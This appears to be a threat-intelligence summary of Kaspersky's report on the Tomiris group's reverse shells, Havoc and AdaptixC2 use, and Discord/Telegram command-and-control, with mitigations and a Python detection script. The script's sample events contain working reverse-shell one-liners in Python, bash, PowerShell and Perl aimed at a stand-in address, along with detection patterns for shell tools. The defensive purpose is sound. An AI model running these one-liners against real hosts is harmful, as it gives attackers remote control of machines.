Full Report
Kaspersky discloses new tools and techniques discovered in 2025 Tomiris activities: multi-language reverse shells, Havoc and AdaptixC2 open-source frameworks, communications via Discord and Telegram.
Analysis Summary
# Threat Actor: Tomiris
## Attribution & Identity
The threat actor is identified as **Tomiris**. The report summary gives no attribution beyond the group name (no country, sponsor or overlap with other tracked clusters is stated).
## Activity Summary
Kaspersky's 2025 report discloses new tools and techniques observed in Tomiris activity during that year; the summary quoted above lists three themes: reverse shells written in several programming languages, adoption of the open-source Havoc and AdaptixC2 frameworks, and communications over Discord and Telegram.
## Tactics, Techniques & Procedures
- Reverse shells implemented in several programming languages ("multi-language reverse shells").
- Use of the open-source post-exploitation frameworks **Havoc** and **AdaptixC2** in place of, or alongside, purely custom tooling.
- Command-and-control communications routed through **Discord** and **Telegram**, i.e. over ordinary HTTPS to legitimate chat-platform APIs.
## Targeting
- **Sectors:** Not specified in the provided context.
- **Geography:** Not specified in the provided context.
- **Victims:** Not specified in the provided context.
## Tools & Infrastructure
- **Malware families used:** Reverse shells written in several programming languages; the summary names no specific malware families.
- **Infrastructure (C2, domains, IPs):**
- C2 traffic is relayed through **Discord** and **Telegram**; the summary does not name the channels, bots, webhooks or accounts involved.
- Use of **Havoc** and **AdaptixC2** implies corresponding framework listeners (team servers), which the summary does not enumerate. No domains or IP addresses are given.
## Implications
Tomiris is actively developing and deploying new capabilities, combining publicly available frameworks (Havoc, AdaptixC2) with its own reverse shells written in several languages. Lowering the cost of tooling by adopting open-source C2 frameworks also blurs attribution, since the same agents are used by many operators. Routing C2 through Discord and Telegram means the traffic goes to legitimate, widely used API endpoints over standard HTTPS, so it blends into normal egress and is hard to separate from benign use by port or destination rules alone.
## Mitigations
- Monitor egress for Discord and Telegram API traffic (for example Discord webhook calls and Telegram Bot API calls) from hosts that have no business reason to reach those services, such as servers and service accounts. This traffic uses standard HTTPS on port 443, so port- or protocol-based rules will not surface it; destination and URL path inspection at the proxy will.
- Where possible, restrict server egress to an allowlist and block chat platforms there outright; on user endpoints, baseline normal client use of these apps and alert on automation-style API use, newly seen hosts, or regular beacon-like intervals.
- Hunt for Havoc and AdaptixC2 agents: known agent binaries and loaders, default listener profiles (request URIs, User-Agent strings, sleep/jitter patterns), and the process-injection and in-memory execution behaviour these frameworks rely on.
- Tune endpoint detection for reverse shells regardless of implementation language: interpreters (python, perl, php, PowerShell) or shells launched with a network-connect plus stdio-redirect idiom, and interactive shells whose parent is an unusual process.
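The following is an added example written for this summary (it is not code from Kaspersky's report or from Tomiris tooling) showing how the first and last mitigations above can be turned into concrete checks. It runs two detections over constructed sample data: proxy log lines are scanned for Discord webhook and Telegram Bot API traffic from hosts outside a workstation allowlist, and process-creation events are matched against reverse-shell idioms in several languages. The log format, the host-naming convention (`WS-` for workstations) and the sample command lines are assumptions; the regexes cover the common public reverse-shell one-liners, not any specific Tomiris sample.

```python
"""Two lightweight detections for the Tomiris TTPs summarised above.

Assumptions (not from the report): proxy log lines look like
"<timestamp> <src_host> <method> <url> <status>", workstation hostnames
start with "WS-", and process events are (parent_image, image, command_line).
All sample data below is constructed for the example.
"""
import re
from urllib.parse import urlparse

# --- Detection 1: chat-platform C2 (Discord / Telegram) ---------------------

# Constructed proxy log: two servers talking to bot/webhook APIs, two benign lines.
SAMPLE_PROXY_LOG = """\
2025-03-04T10:00:01Z WS-ALICE GET https://discord.com/api/v10/gateway 200
2025-03-04T10:00:05Z SRV-FILE01 POST https://discord.com/api/webhooks/1234567890/abcDEFghi 204
2025-03-04T10:00:09Z SRV-DB02 POST https://api.telegram.org/bot123456:ABC-DEF1234ghIkl/sendMessage 200
2025-03-04T10:00:12Z WS-BOB GET https://www.example.com/ 200
"""

# Hosts allowed to use the chat apps interactively (assumption: workstations only).
CHAT_ALLOWED_HOST_PREFIXES = ("WS-",)
CHAT_PLATFORM_HOSTS = {"discord.com", "discordapp.com", "api.telegram.org"}
# Discord webhook path: /api[/vN]/webhooks/<id>/<token>
WEBHOOK_RE = re.compile(r"^/api(?:/v\d+)?/webhooks/\d+/[\w-]+")
# Telegram Bot API path: /bot<id>:<token>/<method>
BOT_API_RE = re.compile(r"^/bot\d+:[\w-]+/")


def classify_chat_url(url):
    """Label a URL as a Discord webhook, Telegram Bot API call, plain chat-platform use, or None."""
    p = urlparse(url)
    if p.hostname not in CHAT_PLATFORM_HOSTS:
        return None
    if p.hostname == "api.telegram.org" and BOT_API_RE.match(p.path):
        return "telegram-bot-api"
    if p.hostname in ("discord.com", "discordapp.com") and WEBHOOK_RE.match(p.path):
        return "discord-webhook"
    return "chat-platform"


def flag_chat_platform_c2(log_text):
    """Return (host, label, url) for suspicious chat-platform traffic.

    Any chat-platform traffic from a non-workstation host is flagged; on
    workstations only bot/webhook API use is flagged, since ordinary client
    traffic (gateway, CDN) is expected there.
    """
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        _ts, host, _method, url, _status = parts
        label = classify_chat_url(url)
        if label is None:
            continue
        if host.startswith(CHAT_ALLOWED_HOST_PREFIXES) and label == "chat-platform":
            continue
        hits.append((host, label, url))
    return hits


# --- Detection 2: multi-language reverse shells -----------------------------

# Constructed process events; the first four are classic public reverse-shell
# one-liners, the last is a benign interpreter launch.
SAMPLE_PROCESS_EVENTS = [
    ("explorer.exe", "python.exe",
     '''python.exe -c "import socket,subprocess,os;s=socket.socket();s.connect(('203.0.113.5',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['cmd.exe'])"'''),
    ("bash", "bash", "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"),
    ("services.exe", "powershell.exe",
     '''powershell.exe -nop -w hidden -c "$c=New-Object Net.Sockets.TCPClient('203.0.113.5',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0}"'''),
    ("cron", "perl",
     """perl -e 'use Socket;$i="203.0.113.5";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");exec("/bin/sh -i");'"""),
    ("explorer.exe", "python.exe", r"python.exe C:\Tools\build.py --release"),
]

# Each language needs ALL of its patterns present: a network connect plus a
# stdio redirect / shell spawn. Order matters only for the label returned.
REVERSE_SHELL_SIGNATURES = {
    "python": [r"\bsocket\b", r"\bdup2\b", r"subprocess|pty\.spawn|os\.system"],
    "bash": [r"/dev/tcp/\S+/\d+"],
    "powershell": [r"Net\.Sockets\.TCPClient", r"GetStream"],
    "perl": [r"\bsocket\(", r"open\(STDIN|exec\("],
    "php": [r"fsockopen", r"exec\(|proc_open|popen"],
    "netcat": [r"\b(nc|ncat|netcat)\b.*\s-e\s"],
}


def match_reverse_shell(command_line):
    """Return the matching signature name, or None."""
    for name, patterns in REVERSE_SHELL_SIGNATURES.items():
        if all(re.search(p, command_line, re.IGNORECASE) for p in patterns):
            return name
    return None


def flag_reverse_shells(events):
    """Return (parent_image, image, signature) for events matching a reverse-shell idiom."""
    hits = []
    for parent, image, cmd in events:
        name = match_reverse_shell(cmd)
        if name:
            hits.append((parent, image, name))
    return hits


if __name__ == "__main__":
    for hit in flag_chat_platform_c2(SAMPLE_PROXY_LOG):
        print("chat-c2:", hit)
    for hit in flag_reverse_shells(SAMPLE_PROCESS_EVENTS):
        print("revshell:", hit)
```

On the sample data the first check flags only the two servers (a Discord webhook POST and a Telegram Bot API call), while the workstation's gateway request passes as ordinary client use. The second check labels the four one-liners by language and ignores the benign `build.py` launch; in production the command-line signatures should be paired with a parent/child check (an interpreter spawning `cmd.exe` or `/bin/sh` with a live socket), since attackers can obfuscate or base64-encode the one-liner.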